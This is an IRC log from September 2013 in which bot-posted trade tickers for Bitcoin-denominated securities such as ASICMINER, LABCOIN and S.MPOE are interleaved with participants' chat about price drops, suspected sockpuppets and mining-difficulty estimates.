[ASICMINER-PT] 1 @ 1.99 BTC [+] Sep 06 02:40:19 "Following up on a report about a Russian antitheft technology, Clarke came across Yuriy Semenov, who was in charge of the High Tech Bureau, a government initiative to sell Soviet-era military research to Western investors. Semenov had a better idea for the General: "How would you like to grow diamonds?"" Sep 06 02:40:20 [BTCTC] [TAT.ASICMINER] 1 @ 0.02001 BTC [+] Sep 06 02:40:21 [BTCTC] [TAT.ASICMINER] 1 @ 0.02 BTC [-] Sep 06 02:40:23 [BTCTC] [TAT.ASICMINER] 7 @ 0.02 = 0.14 BTC [-] Sep 06 02:40:31 Lol, silly russians Sep 06 02:41:43 [BTCTC] [BTC-GROWTH] 1 @ 0.1 BTC [-] Sep 06 02:41:44 [BTCTC] [BTC-GROWTH] 10 @ 0.1 = 1 BTC [-] Sep 06 02:41:46 [BTCTC] [BTC-GROWTH] 2 @ 0.1 = 0.2 BTC [-] Sep 06 02:41:46 [BTCTC] [BTC-GROWTH] 15 @ 0.09904 = 1.4856 BTC [-] Sep 06 02:41:47 [BTCTC] [BTC-GROWTH] 1 @ 0.09904 BTC [-] Sep 06 02:41:49 [BTCTC] [BTC-GROWTH] 3 @ 0.09901 = 0.297 BTC [-] Sep 06 02:41:50 [BTCTC] [BTC-GROWTH] 39 @ 0.09901 = 3.8614 BTC [-] Sep 06 02:44:06 [BTCTC] [TAT.ASICMINER] 7 @ 0.01995 = 0.1397 BTC [-] Sep 06 02:44:07 [BTCTC] [TAT.ASICMINER] 7 @ 0.0199 = 0.1393 BTC [-] Sep 06 02:49:14 [BTCTC] [CB.IDIFF-O] 1 @ 0.00941 BTC [+] Sep 06 02:50:50 [BTCTC] [TAT.ASICMINER] 20 @ 0.01946 = 0.3892 BTC [-] Sep 06 02:50:51 [BTCTC] [TAT.ASICMINER] 100 @ 0.01945 = 1.945 BTC [-] Sep 06 02:50:53 [BTCTC] [TAT.ASICMINER] 3 @ 0.01938 = 0.0581 BTC [-] Sep 06 02:50:54 [BTCTC] [TAT.ASICMINER] 55 @ 0.01937 = 1.0654 BTC [-] Sep 06 02:58:15 [BTCTC] [ASICMINER-PT] 1 @ 2 BTC [+] Sep 06 02:58:17 [BTCTC] [ASICMINER-PT] 1 @ 1.95 BTC [-] Sep 06 02:58:18 [BTCTC] [ASICMINER-PT] 2 @ 1.941 = 3.882 BTC [-] Sep 06 02:58:18 [BTCTC] [ASICMINER-PT] 1 @ 1.93 BTC [-] Sep 06 02:58:19 [BTCTC] [ASICMINER-PT] 1 @ 1.93 BTC [-] Sep 06 02:59:36 [BTCTC] [FIMB] 60 @ 0.0109 = 0.654 BTC [+] Sep 06 03:00:02 [BTCTC] [LABCOIN] 5 @ 0.00335 = 0.0168 BTC [+] Sep 06 03:00:03 [BTCTC] [LABCOIN] 5 @ 0.003351 = 0.0168 BTC [+] Sep 06 03:00:28 [BTCTC] [FIMB] 1 @ 0.0109 BTC [+] Sep 06 03:03:46 [BTCTC] [BASIC-MINING] 1 @ 0.1252 BTC [+] Sep 06 03:03:56 [BTCTC] [ACTIVEMINING] 2 @ 0.004507 = 0.009 BTC [+] Sep 06 03:04:43 [BTCTC] [BASIC-MINING] 1 @ 0.1252 BTC [+] Sep 06 03:05:33 [HAVELOCK] [AM100] 10 @ 0.0205 = 0.205 BTC [-] Sep 06 03:05:48 [BTCTC] [LABCOIN] 15 @ 0.003351 = 0.0503 BTC [+] Sep 06 03:07:02 [BTCTC] [ASICMINER-PT] 2 @ 2.047 = 4.094 BTC [+] Sep 06 03:07:03 [BTCTC] [ASICMINER-PT] 10 @ 2.048 = 20.48 BTC [+] Sep 06 03:07:14 [HAVELOCK] [AM100] 11 @ 0.0204002 = 0.2244 BTC [-] Sep 06 03:07:29 [HAVELOCK] [AM100] 10 @ 0.02040001 = 0.204 BTC [-] Sep 06 03:07:37 [HAVELOCK] [AM100] 10 @ 0.0203 = 0.203 BTC [-] Sep 06 03:07:42 [HAVELOCK] [AM100] 40 @ 0.0202 = 0.808 BTC [-] Sep 06 03:09:10 [MPEX] [S.MPOE] 1069 @ 0.00089501 = 0.9568 BTC [+] Sep 06 03:09:33 [HAVELOCK] [AM100] 20 @ 0.0201002 = 0.402 BTC [-] Sep 06 03:10:34 [BTCTC] [LABCOIN] 377 @ 0.003241 = 1.2219 BTC [-] Sep 06 03:10:35 [BTCTC] [LABCOIN] 5 @ 0.003241 = 0.0162 BTC [-] Sep 06 03:10:36 [BTCTC] [LABCOIN] 1511 @ 0.00324 = 4.8956 BTC [-] Sep 06 03:10:37 [BTCTC] [LABCOIN] 2500 @ 0.003238 = 8.095 BTC [-] Sep 06 03:20:19 [BTCTC] [LABCOIN] 1991 @ 0.003242 = 6.4548 BTC [+] Sep 06 03:21:41 [HAVELOCK] [AM100] 9 @ 0.0201002 = 0.1809 BTC [-] Sep 06 03:22:57 [HAVELOCK] [AM100] 7 @ 0.0201002 = 0.1407 BTC [-] Sep 06 03:23:07 [BTCTC] [ASICMINER-PT] 1 @ 1.971 BTC [-] Sep 06 03:23:08 [BTCTC] [ASICMINER-PT] 1 @ 1.97 BTC [-] Sep 06 03:23:09 [BTCTC] [ASICMINER-PT] 2 @ 1.97 = 3.94 BTC [-] Sep 06 03:23:10 [BTCTC] [ASICMINER-PT] 2 @ 1.951 = 3.902 BTC [-] Sep 06 03:23:11 [BTCTC] [ASICMINER-PT] 4 @ 1.95 = 7.8 BTC [-] Sep 06 03:24:09 [HAVELOCK] [AM100] 1 @ 0.0201 BTC [-] Sep 06 03:24:14 [HAVELOCK] [AM100] 3 @ 0.0201 = 0.0603 BTC [-] Sep 06 03:24:23 [HAVELOCK] [AM100] 174 @ 0.0200501 = 3.4887 BTC [-] Sep 06 03:24:29 [HAVELOCK] [AM100] 10 @ 0.02001 = 0.2001 BTC [-] Sep 06 03:24:39 [HAVELOCK] [AM100] 256 @ 0.02 = 5.12 BTC [-] Sep 06 03:25:23 [HAVELOCK] [AM100] 200 @ 0.02 = 4 BTC [-] Sep 06 03:26:06 [HAVELOCK] [AM1] 1 @ 2.01 BTC [-] Sep 06 03:26:08 [HAVELOCK] [AM1] 1 @ 2 BTC [-] Sep 06 03:26:28 [HAVELOCK] [AM100] 244 @ 0.02 = 4.88 BTC [-] Sep 06 03:26:31 [HAVELOCK] [AM100] 10 @ 0.02 = 0.2 BTC [-] Sep 06 03:29:37 bitcointalk is down for me, why is people panic selling? what is the news? Sep 06 03:30:00 who's panic selling ? Sep 06 03:30:09 [BTCTC] [LABCOIN] 50 @ 0.003244 = 0.1622 BTC [+] Sep 06 03:30:44 seems people are selling Asicminer Sep 06 03:31:20 [HAVELOCK] [AM100] 1 @ 0.0201002 BTC [+] Sep 06 03:31:20 theyve been selling for weeks no? Sep 06 03:31:36 down 20% since yesterday though, no? Sep 06 03:31:49 AM price is shocking Sep 06 03:31:57 http://www.youtube.com/watch?v=xwOCmJevigw vaguely related. Sep 06 03:31:59 Three Minute Philosophy - Immanuel Kant - YouTube Sep 06 03:32:14 userioao it's only shocking to noobs. Sep 06 03:32:23 telnet bitcointalk.org Sep 06 03:32:23 Trying 109.201.133.65... Sep 06 03:32:23 uff Sep 06 03:32:31 who try cover up Sep 06 03:32:43 mircea_popescu it's shocking to me i brought 50 at 4.1 Sep 06 03:32:46 lol Sep 06 03:32:57 pwned Sep 06 03:32:59 damn... Sep 06 03:33:14 you gotta listen better, and pick where you listen even better than that. Sep 06 03:33:24 i dumped outta labcoin junk Sep 06 03:33:29 also lost 10k on that Sep 06 03:33:35 then though am was a safe bet Sep 06 03:33:42 safer. Sep 06 03:33:45 didn't expect it to rise just to stay stable for a few weeks Sep 06 03:33:57 cause couldn't cash it out of exchange quickly Sep 06 03:34:23 mircea_popescu: i found my old acc on bitcointalk Sep 06 03:34:26 you do the finance community a great service Sep 06 03:34:55 i realised i made some posts when 500 btc was 1 dollar Sep 06 03:35:20 fucked up so much on bitcoin :'( Sep 06 03:35:21 only 800btc to AM is trading at 1.0 Sep 06 03:35:28 sounds like a good bottom Sep 06 03:35:52 poor AM.. Sep 06 03:36:14 think it will go back up to 4 with the next gen stuff? Sep 06 03:36:38 which one did you found lately? dvdrewritable or Anotheranonlol? Sep 06 03:36:50 dexX7: :) Sep 06 03:36:55 I have got some more Sep 06 03:37:01 user ID 22 was my original Sep 06 03:37:12 lol dexX7 Sep 06 03:37:15 i forgot pw for some :/ Sep 06 03:38:31 https://bitcointalk.org/index.php?action=profile;u=22 Sep 06 03:38:35 View the profile of RogerRabbit Sep 06 03:38:39 hm... wild guess, nickwen? :p Sep 06 03:38:43 no Sep 06 03:38:58 this 1 was my other but i cant remember the pass Sep 06 03:39:20 https://bitcointalk.org/index.php?topic=25.msg126#msg126 Sep 06 03:39:23 A newb's test - anyone want to buy a picture for $1? Sep 06 03:39:26 [BTCTC] [BTC-GOLD] 8 @ 0.005002 = 0.04 BTC [-] Sep 06 03:39:35 I think that op was sab u Sep 06 03:39:41 in jail now Sep 06 03:41:01 does nobody else think COG is prtty fishy? Sep 06 03:41:16 oldnews Sep 06 03:42:00 the guy using sockpuppet Sep 06 03:42:09 https://bitcointalk.org/index.php?topic=67547.msg3061166#msg3061166 Sep 06 03:42:14 Starting a new FPGA mining farm/contract Cognitive Resurrected on [BTC-TC] Sep 06 03:42:33 seems engaged in a spiral of doom Sep 06 03:42:53 started as ambitious kid, got slowly worked into a shade. Sep 06 03:42:58 yes Sep 06 03:43:55 mircea_popescu: you still list my name as shill on u website Sep 06 03:43:58 plz take off Sep 06 03:44:35 just make a comment to the contrary. Sep 06 03:45:20 says the guy with multiple accounts Sep 06 03:45:22 ? Sep 06 03:45:46 I'm just trying to help people not to take a penny off anybody Sep 06 03:46:57 [BTCTC] [ASICMINER-PT] 2 @ 2.038 = 4.076 BTC [+] Sep 06 03:47:07 I wonder why there is not more interest for CryptX? Sep 06 03:47:16 PETA-MINE Sep 06 03:47:42 [BTCTC] [ASICMINER-PT] 1 @ 2.045 BTC [+] Sep 06 03:48:11 possibly related to them changing ipo terms at will Sep 06 03:48:53 yeah doesn't look good Sep 06 03:48:58 [BTCTC] [ASICMINER-PT] 1 @ 2.044 BTC [-] Sep 06 03:49:06 for some values of possibly. Sep 06 03:49:41 [BTCTC] [ASICMINER-PT] 1 @ 2.047 BTC [+] Sep 06 03:50:27 [BTCTC] [ASICMINER-PT] 1 @ 2.045 BTC [-] Sep 06 03:51:12 [BTCTC] [ASICMINER-PT] 1 @ 2.044 BTC [-] Sep 06 03:52:12 [BTCTC] [ASICMINER-PT] 1 @ 2.047 BTC [+] Sep 06 03:52:27 [BTCTC] [ACTIVEMINING] 366 @ 0.004607 = 1.6862 BTC [+] Sep 06 03:52:41 [BTCTC] [ACTIVEMINING] 91 @ 0.004604 = 0.419 BTC [-] Sep 06 03:58:10 PETA MINE Sep 06 03:58:44 thestringpuller: what about it? Sep 06 04:03:34 your face Sep 06 04:03:39 YOUR FACE Sep 06 04:08:04 [HAVELOCK] [XBOND] 20 @ 0.0011198 = 0.0224 BTC [-] Sep 06 04:08:11 JUST A TOUCH Sep 06 04:08:16 [BTCTC] [ASICMINER-PT] 1 @ 2.039 BTC [-] Sep 06 04:09:15 [BTCTC] [ASICMINER-PT] 3 @ 2.039 = 6.117 BTC [-] Sep 06 04:10:17 [MPEX] [S.MPOE] 10000 @ 0.0009 = 9 BTC [+] Sep 06 04:10:23 [MPEX] [S.MPOE] 8900 @ 0.00090058 = 8.0152 BTC [+] Sep 06 04:15:06 [BTCTC] [ASICMINER-PT] 4 @ 2.04 = 8.16 BTC [+] Sep 06 04:15:06 [BTCTC] [ASICMINER-PT] 1 @ 2.046 BTC [+] Sep 06 04:25:41 is there a business reason for the recent mpoe rise? like did they land a deal with somebody or something? Sep 06 04:26:34 go away Sep 06 04:26:42 I'm not trolling Sep 06 04:26:54 I'm holding Sep 06 04:26:59 mpoe stock will always go up Sep 06 04:27:08 thinking of firing up the wood chipper. Sep 06 04:27:18 very funny Sep 06 04:27:31 and "will always go up" doesn't make sense as a business reason Sep 06 04:27:56 MPOE is necessary Sep 06 04:28:20 no matter what it will always pay dividends as shareholders are not liable for the bot, bond holders are Sep 06 04:29:22 yeah, but, I'm not sure what they do anymore and there's no orders. Sep 06 04:29:25 [MPEX] [S.MPOE] 10750 @ 0.00089918 = 9.6662 BTC [-] Sep 06 04:29:27 [MPEX] [S.MPOE] 6900 @ 0.00089834 = 6.1985 BTC [-] Sep 06 04:29:36 !ticker m ^OIX Sep 06 04:29:37 [MPEX:^OIX] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: / / ( shares, BTC), 30D: 0 / 0 / 0 (0 shares, 0 BTC) Sep 06 04:29:42 [MPEX] [S.MPOE] 2250 @ 0.00089302 = 2.0093 BTC [-] Sep 06 04:29:45 beginning of month wait for it Sep 06 04:29:53 [BTCTC] [BTC-BOND] 100 @ 0.01 = 1 BTC [+] Sep 06 04:29:56 that wasn't me Sep 06 04:29:56 mega ipo put bets down Sep 06 04:30:50 so, the month hasn't started yet? Sep 06 04:30:59 it has Sep 06 04:31:08 >:( Sep 06 04:32:00 bloctoc how much did it rise ? Sep 06 04:34:00 I guess that's a good point. seems big on the chart. Sep 06 04:34:28 [BTCTC] [B.YABMC] 100 @ 0.001366 = 0.1366 BTC [-] Sep 06 04:34:28 [BTCTC] [B.YABMC] 190 @ 0.001365 = 0.2594 BTC [-] Sep 06 04:34:28 [BTCTC] [B.YABMC] 1 @ 0.001102 BTC [-] Sep 06 04:34:28 [BTCTC] [B.YABMC] 300 @ 0.0011 = 0.33 BTC [-] Sep 06 04:34:29 [BTCTC] [B.YABMC] 50 @ 0.0008 = 0.04 BTC [-] Sep 06 04:35:10 a looky, it touched 9 Sep 06 04:35:37 [BTCTC] [BTC-GOLD] 83 @ 0.005409 = 0.4489 BTC [+] Sep 06 04:35:37 [BTCTC] [BTC-GOLD] 10 @ 0.00541 = 0.0541 BTC [+] Sep 06 04:35:40 [MPEX] [S.MPOE] 11900 @ 0.00090058 = 10.7169 BTC [+] Sep 06 04:36:14 … but there's some new depth that makes my own relatively paltry sum go up like 20% over the last month just trying to learn and act or not act that's all. Sep 06 04:37:04 9 is a new high right? Sep 06 04:37:19 i think its an ath yeah Sep 06 04:37:27 congrats. Sep 06 04:37:28 well, if it helps you any, Sep 06 04:37:47 ;;google Is S.MPOE really worth that much ?! Sep 06 04:37:49 Is S.MPOE really worth that much ?! pe Trilema - Un blog de Mircea ...: ; Why S.MPOE is worth more than MtGox pe Trilema - Un blog de ...: ; Morris Prigoff Net Worth | Celebrity Net Worth: thanks - I'll read up Sep 06 04:38:13 beat you by about a year :p Sep 06 04:39:43 [BTCTC] [PETA-MINE] 3 @ 0.66 = 1.98 BTC [+] Sep 06 04:40:31 lol Sep 06 04:40:36 mircea_popescu: is it still monetizing? Sep 06 04:41:40 da fuck if i know. Sep 06 04:42:00 was a wild guess then, hasn't gotten much better. Sep 06 04:42:39 what's the alternative to mpoe? Icbit? Sep 06 04:42:42 *old men laughing* Sep 06 04:42:53 [BTCTC] [LABCOIN] 5 @ 0.00333 = 0.0167 BTC [+] Sep 06 04:42:54 [BTCTC] [LABCOIN] 5 @ 0.003331 = 0.0167 BTC [+] Sep 06 04:42:55 [BTCTC] [LABCOIN] 7 @ 0.003379 = 0.0237 BTC [+] Sep 06 04:44:29 [BTCTC] [LABCOIN] 105 @ 0.003377 = 0.3546 BTC [-] Sep 06 04:45:52 [BTCTC] [ASICMINER-PT] 1 @ 2.032 BTC [-] Sep 06 04:47:36 [HAVELOCK] [XBOND] 45 @ 0.00111975 = 0.0504 BTC [-] Sep 06 04:49:22 [BTCTC] [ASICMINER-PT] 8 @ 2.029 = 16.232 BTC [-] Sep 06 04:49:23 [BTCTC] [ASICMINER-PT] 1 @ 2.031 BTC [+] Sep 06 04:49:25 [BTCTC] [ASICMINER-PT] 1 @ 2.033 BTC [+] Sep 06 04:50:12 [BTCTC] [TAT.ASICMINER] 8 @ 0.01988 = 0.159 BTC [+] Sep 06 04:50:25 [BTCTC] [ASICMINER-PT] 1 @ 2.001 BTC [-] Sep 06 04:50:26 [BTCTC] [ASICMINER-PT] 2 @ 2.001 = 4.002 BTC [-] Sep 06 04:50:27 [BTCTC] [ASICMINER-PT] 5 @ 2 = 10 BTC [-] Sep 06 04:51:03 [HAVELOCK] [AM100] 35 @ 0.02 = 0.7 BTC [-] Sep 06 04:51:13 [BTCTC] [TAT.ASICMINER] 1 @ 0.01988 BTC [+] Sep 06 04:51:17 [BTCTC] [B.YABMC] 59 @ 0.0008 = 0.0472 BTC [-] Sep 06 04:51:37 [BTCTC] [ASICMINER-PT] 2 @ 2.03 = 4.06 BTC [+] Sep 06 04:55:02 changing the subject from asicminer. MP should dump the horse and get some desert goggles for his next trilema photo shoot: http://sfist.com/2013/09/05/winklevoss_and_his_khakis_officiall.php Sep 06 04:56:03 bloctoc twas a candid, not a shoot. i've yet to go to a shoot tbh. Sep 06 04:56:17 mea culpa Sep 06 05:01:49 [BTCTC] [LABCOIN] 1 @ 0.0033 BTC [-] Sep 06 05:09:02 I'm so sick of the Winklevii Sep 06 05:10:33 honestly i prefer them to both amir taaki and britney spears. Sep 06 05:10:41 at least they don't try to either sing or talk too much. Sep 06 05:11:02 you sounded like eminem for a second Sep 06 05:11:23 "You can't blame this on Britney Spears can you?" "Yes you can" (serious stare) Sep 06 05:11:37 lol Sep 06 05:12:54 [BTCTC] [ASICMINER-PT] 1 @ 2.002 BTC [-] Sep 06 05:14:04 [BTCTC] [ASICMINER-PT] 2 @ 2 = 4 BTC [-] Sep 06 05:14:39 [BTCTC] [ACTIVEMINING] 120 @ 0.004569 = 0.5483 BTC [-] Sep 06 05:15:12 [BTCTC] [ASICMINER-PT] 1 @ 2 BTC [-] Sep 06 05:15:59 [BTCTC] [ASICMINER-PT] 4 @ 2 = 8 BTC [-] Sep 06 05:20:35 [BTCTC] [LTC-ATF.B2] 7 @ 0.01034 = 0.0724 BTC [-] Sep 06 05:20:37 [BTCTC] [LTC-ATF.B2] 1 @ 0.01032 BTC [-] Sep 06 05:20:37 [BTCTC] [LTC-ATF.B2] 30 @ 0.01032 = 0.3096 BTC [-] Sep 06 05:20:38 [BTCTC] [LTC-ATF.B2] 2 @ 0.01031 = 0.0206 BTC [-] Sep 06 05:20:40 [BTCTC] [LTC-ATF.B2] 1 @ 0.01031 BTC [-] Sep 06 05:20:41 [BTCTC] [LTC-ATF.B2] 1 @ 0.0103 BTC [-] Sep 06 05:20:42 [BTCTC] [LTC-ATF.B2] 1 @ 0.0103 BTC [-] Sep 06 05:21:37 [BTCTC] [LTC-ATF.B2] 3 @ 0.01023 = 0.0307 BTC [-] Sep 06 05:22:44 [BTCTC] [ASICMINER-PT] 2 @ 1.978 = 3.956 BTC [-] Sep 06 05:22:45 [BTCTC] [ASICMINER-PT] 1 @ 1.978 BTC [-] Sep 06 05:24:37 [HAVELOCK] [AM100] 7 @ 0.0217 = 0.1519 BTC [+] Sep 06 05:24:44 [HAVELOCK] [HIM] 1 @ 0.135 BTC [-] Sep 06 05:25:09 [BTCTC] [TAT.VIRTUALMINE] 25 @ 0.0006011 = 0.015 BTC [+] Sep 06 05:25:10 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.0006001 BTC [-] Sep 06 05:25:16 [BTCTC] [TAT.VIRTUALMINE] 795 @ 0.0006 = 0.477 BTC [-] Sep 06 05:26:22 [BTCTC] [LTC-ATF.B2] 15 @ 0.01047 = 0.1571 BTC [+] Sep 06 05:26:44 [BTCTC] [LTC-ATF.B2] 35 @ 0.01048 = 0.3668 BTC [+] Sep 06 05:28:08 [HAVELOCK] [AM100] 3 @ 0.0217 = 0.0651 BTC [+] Sep 06 05:31:43 [BTCTC] [TAT.ASICMINER] 1 @ 0.02 BTC [+] Sep 06 05:32:53 [BTCTC] [LABCOIN] 5 @ 0.003287 = 0.0164 BTC [-] Sep 06 05:32:54 [BTCTC] [LABCOIN] 5 @ 0.003288 = 0.0164 BTC [+] Sep 06 05:32:56 [BTCTC] [LABCOIN] 999 @ 0.003299 = 3.2957 BTC [+] Sep 06 05:35:00 [BTCTC] [TAT.VIRTUALMINE] 3 @ 0.0006521 = 0.002 BTC [+] Sep 06 05:38:31 [BTCTC] [DMS.SELLING] 46 @ 0.00998 = 0.4591 BTC [+] Sep 06 05:44:48 [BTCTC] [ASICMINER-PT] 2 @ 2.02 = 4.04 BTC [+] Sep 06 05:45:20 [BTCTC] [ASICMINER-PT] 5 @ 2.033 = 10.165 BTC [+] Sep 06 05:48:29 [MPEX] [S.MPOE] 632 @ 0.00089302 = 0.5644 BTC [-] Sep 06 05:48:31 [MPEX] [S.MPOE] 5968 @ 0.00089299 = 5.3294 BTC [-] Sep 06 05:53:23 [BTCTC] [BFMINES] 150 @ 0.002901 = 0.4352 BTC [-] Sep 06 05:55:50 [BTCTC] [TAT.ASICMINER] 3 @ 0.02046 = 0.0614 BTC [+] Sep 06 06:10:20 [BTCTC] [ASICMINER-PT] 1 @ 2.033 BTC [+] Sep 06 06:11:53 [MPEX] [S.MPOE] 9594 @ 0.00089649 = 8.6009 BTC [+] Sep 06 06:15:15 [BTCTC] [ASICMINER-PT] 1 @ 2.033 BTC [+] Sep 06 06:15:19 [MPEX] [S.MPOE] 12250 @ 0.00089649 = 10.982 BTC [+] Sep 06 06:18:05 [BTCTC] [ACTIVEMINING] 76 @ 0.004602 = 0.3498 BTC [+] Sep 06 06:18:19 [BTCTC] [ACTIVEMINING] 231 @ 0.004601 = 1.0628 BTC [-] Sep 06 06:21:03 [BTCTC] [DMS.SELLING] 44 @ 0.00998 = 0.4391 BTC [+] Sep 06 06:21:39 [BTCTC] [ASICMINER-PT] 1 @ 2.033 BTC [+] Sep 06 06:22:37 [BTCTC] [TAT.ASICMINER] 36 @ 0.02025 = 0.729 BTC [-] Sep 06 06:23:43 [MPEX] [S.MPOE] 232 @ 0.00089299 = 0.2072 BTC [-] Sep 06 06:23:45 [MPEX] [S.MPOE] 4726 @ 0.0008911 = 4.2113 BTC [-] Sep 06 06:23:57 [MPEX] [S.MPOE] 5142 @ 0.00089082 = 4.5806 BTC [-] **** BEGIN LOGGING AT Fri Sep 6 16:33:13 2013 Sep 06 16:36:42 [BTCTC] [BTC-GROWTH] 25 @ 0.09951 = 2.4878 BTC [-] Sep 06 16:36:44 [BTCTC] [BTC-GROWTH] 15 @ 0.0995 = 1.4925 BTC [-] Sep 06 16:36:45 [BTCTC] [BTC-GROWTH] 10 @ 0.09901 = 0.9901 BTC [-] Sep 06 16:38:46 [BTCTC] [TAT.VIRTUALMINE] 365 @ 0.0006 = 0.219 BTC [-] Sep 06 16:39:02 [HAVELOCK] [AM100] 1 @ 0.0197 BTC [-] Sep 06 16:42:05 [HAVELOCK] [AM100] 1 @ 0.0204 BTC [+] Sep 06 16:42:14 [HAVELOCK] [AM100] 9 @ 0.0204 = 0.1836 BTC [+] Sep 06 16:42:26 [BTCTC] [BMF] 10 @ 0.033 = 0.33 BTC [-] Sep 06 16:43:27 [HAVELOCK] [XBOND] 10 @ 0.00109996 = 0.011 BTC [-] Sep 06 16:48:34 [HAVELOCK] [AM100] 10 @ 0.0199 = 0.199 BTC [-] Sep 06 16:48:37 [HAVELOCK] [AM100] 76 @ 0.01980001 = 1.5048 BTC [-] Sep 06 16:48:40 [MPEX] [S.MPOE] 12760 @ 0.00088244 = 11.2599 BTC [-] Sep 06 16:48:40 [MPEX] [S.MPOE] 6150 @ 0.00088196 = 5.4241 BTC [-] Sep 06 16:48:54 [MPEX] [S.MPOE] 5290 @ 0.0008817 = 4.6642 BTC [-] Sep 06 16:49:08 [BTCTC] [ACTIVEMINING] 10 @ 0.004341 = 0.0434 BTC [+] Sep 06 16:49:09 [BTCTC] [ACTIVEMINING] 19 @ 0.004342 = 0.0825 BTC [+] Sep 06 16:51:43 [BTCTC] [B.YABMC] 2 @ 0.000421 = 0.0008 BTC [-] Sep 06 16:52:12 [BTCTC] [TAT.MINIGAME] 100 @ 0.0002756 = 0.0276 BTC [-] Sep 06 16:52:13 [BTCTC] [TAT.MINIGAME] 700 @ 0.0002756 = 0.1929 BTC [-] Sep 06 16:54:31 [BTCTC] [DMS.MINING] 13 @ 0.002389 = 0.0311 BTC [+] Sep 06 16:55:24 [HAVELOCK] [AM100] 10 @ 0.0205 = 0.205 BTC [+] Sep 06 16:55:40 [BTCTC] [B.YABMC] 25 @ 0.00042 = 0.0105 BTC [-] Sep 06 16:56:32 [BTCTC] [BTC-BOND] 5 @ 0.01 = 0.05 BTC [+] Sep 06 16:56:35 [BTCTC] [TAT.ASICMINER] 7 @ 0.02018 = 0.1413 BTC [+] Sep 06 16:57:04 [BTCTC] [TAT.ASICMINER] 1 @ 0.01951 BTC [-] Sep 06 17:07:40 [HAVELOCK] [XBOND] 1 @ 0.00109996 BTC [-] Sep 06 17:12:43 [BTCTC] [ESECURITYSABTC] 1 @ 0.22 BTC [-] Sep 06 17:12:44 [BTCTC] [ESECURITYSABTC] 4 @ 0.2231 = 0.8924 BTC [+] Sep 06 17:12:45 hello?? Sep 06 17:12:52 ni hao Sep 06 17:13:42 ACTM TO MARS!! Sep 06 17:13:51 stop being retarded. Sep 06 17:14:04 [BTCTC] [FIMB] 1 @ 0.0109 BTC [+] Sep 06 17:15:06 Ebay to accept BTC late September. Sep 06 17:15:21 go away. Sep 06 17:15:49 [MPEX] [S.MPOE] 4483 @ 0.0008817 = 3.9527 BTC [-] Sep 06 17:15:51 [MPEX] [S.MPOE] 307 @ 0.00088133 = 0.2706 BTC [-] Sep 06 17:16:04 $vwap ^oix Sep 06 17:16:06 mircea_popescu: An error has occurred and has been logged. Please contact this bot's administrator for more information. Sep 06 17:16:25 $t m ^oix Sep 06 17:18:44 !t m ^oix Sep 06 17:18:46 [MPEX:^OIX] 1D: 0 / 0 / 0 (0 shares, 0 BTC), 7D: / 195.15803475 / 195.15803475 (4 shares, 1.65 BTC), 30D: 0 / 0 / 0 (0 shares, 0 BTC) Sep 06 17:19:07 [BTCTC] [ACTIVEMINING] 75 @ 0.004011 = 0.3008 BTC [-] Sep 06 17:19:37 [HAVELOCK] [AM100] 2 @ 0.01941002 = 0.0388 BTC [-] Sep 06 17:19:45 [HAVELOCK] [AM100] 10 @ 0.01941 = 0.1941 BTC [-] Sep 06 17:20:18 [BTCTC] [LABCOIN] 5 @ 0.003263 = 0.0163 BTC [-] Sep 06 17:20:26 [HAVELOCK] [AM100] 10 @ 0.01941 = 0.1941 BTC [-] Sep 06 17:20:32 [BTCTC] [LABCOIN] 200 @ 0.003263 = 0.6526 BTC [-] Sep 06 17:20:41 [BTCTC] [LABCOIN] 200 @ 0.003263 = 0.6526 BTC [-] Sep 06 17:20:56 [HAVELOCK] [AM100] 2 @ 0.01921 = 0.0384 BTC [-] Sep 06 17:20:59 [BTCTC] [LABCOIN] 61 @ 0.003263 = 0.199 BTC [-] Sep 06 17:21:18 [HAVELOCK] [XBOND] 1 @ 0.001066 BTC [-] Sep 06 17:27:30 [HAVELOCK] [AM1] 1 @ 1.99 BTC [-] Sep 06 17:28:07 ;;nethash Sep 06 17:28:07 760602.768699 Sep 06 17:28:16 ;;estimate Sep 06 17:28:17 Next difficulty estimate | 104323126.915 based on data since last change | 106253357.998 based on data for last three days Sep 06 17:28:38 are we gonna have a party? Sep 06 17:28:44 whoa. Sep 06 17:29:06 ;;nethash Sep 06 17:29:07 760602.768699 Sep 06 17:29:33 ima go have a party. Sep 06 17:29:51 ;;bc,stats Sep 06 17:29:54 Current Blocks: 256449 | Current Difficulty: 8.693301777119441E7 | Next Difficulty At Block: 258047 | Next Difficulty In: 1598 blocks | Next Difficulty In About: 1 week, 1 day, 14 hours, 11 minutes, and 36 seconds | Next Difficulty Estimate: 104323126.915 | Estimated Percent Change: 20.00403 Sep 06 17:30:41 well, idiff going to pay out week earlier :/ Sep 06 17:32:12 your 29s are safe at least Sep 06 17:32:17 maybe even those 22s Sep 06 17:32:54 jurov what was your limit for this month ? Sep 06 17:33:01 100m Sep 06 17:34:53 mircea_popescu: and your X.IDIFF.SEP ones? do they even exist? Sep 06 17:34:58 anymore Sep 06 17:35:06 well yes, same as always Sep 06 17:35:29 3.9x last settlement or whatever it was Sep 06 17:35:38 no, only 2.9 iirc Sep 06 17:35:44 2.9 yea Sep 06 17:35:46 [HAVELOCK] [XBOND] 1 @ 0.00109996 BTC [+] Sep 06 17:35:59 that's definitely less than 100m, too Sep 06 17:36:09 Thus for example the X.IDIFF.SEP traded in January 2013 will settle on MPEx on September the 18th, 2013. Should the network difficulty at that time be 3370182 then each contract will be worth 0.03370182 BTC. Sep 06 17:36:11 bwahahaha Sep 06 17:36:16 jurov for sure. Sep 06 17:36:31 [BTCTC] [LABCOIN] 5 @ 0.0033 = 0.0165 BTC [+] Sep 06 17:36:33 [BTCTC] [LABCOIN] 10 @ 0.003301 = 0.033 BTC [+] Sep 06 17:36:34 [BTCTC] [LABCOIN] 5 @ 0.003304 = 0.0165 BTC [+] Sep 06 17:36:35 [BTCTC] [LABCOIN] 385 @ 0.003347 = 1.2886 BTC [+] Sep 06 17:36:36 [BTCTC] [LABCOIN] 390 @ 0.003349 = 1.3061 BTC [+] Sep 06 17:36:43 well, december should be interesting at this rate, 0.3 each or some shit. Sep 06 17:36:54 [BTCTC] [LABCOIN] 5 @ 0.00335 = 0.0168 BTC [+] Sep 06 17:36:54 [BTCTC] [LABCOIN] 7 @ 0.003359 = 0.0235 BTC [+] Sep 06 17:36:56 [BTCTC] [LABCOIN] 7 @ 0.00336 = 0.0235 BTC [+] Sep 06 17:36:57 [BTCTC] [LABCOIN] 385 @ 0.003365 = 1.2955 BTC [+] Sep 06 17:36:58 [BTCTC] [LABCOIN] 16 @ 